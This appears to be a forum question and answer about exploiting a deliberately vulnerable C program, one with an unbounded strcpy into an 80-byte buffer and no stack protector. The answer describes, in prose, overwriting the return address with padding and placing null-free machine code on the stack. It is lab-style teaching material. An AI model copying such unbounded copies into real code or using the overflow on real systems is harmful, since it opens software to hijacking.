My aim is to write an infinite loop. I have to print infinitely this string "Hello World %s" and I can just use ROP (Return-oriented programming).
gcc -fno-stack-protector loop.c -o loop
I can compile as shown. How can I do ROP?
#include<stdio.h>
#include<string.h>
main(char argc, char ** argv){
char buffer[80];
strcpy(buffer,argv[1]);
printf("Hello World %s",buffer);
return 1;
}
So, the rough approach:
buffer is located on the stack, where the return address of the main function-callee is located. Due to the fact, that the stacks grows backwards you can overwrite the return address, since it got appended before. The stack should look like this:
[buffer data][ebp save][callee return address]...anything
It's not quite sure, but pretty likely, that the callee's return address is located after the ebp saved value, which is located after the buffer data, so you would need to give a 84 byte long array of data (not containing 0x00, because that would terminate the string) followed by the return address. The address needs to point somewhere, where your "hack" is located in memory. One possible location for this would be the stack itself, so you might want to append the machine code of the infinite loop after the return address.
It's important to note, that you have to generate machine code, that does not contain a null-byte. An example layout of the argument string, that you might give to the program should look like this:
[84 byte data][return address][machine code]
This should work on older linux kernels. Additionally this assumes you are working on a 32 bit system, so pointers are 4 bytes long. On a 64 bit system it would be 8 bytes.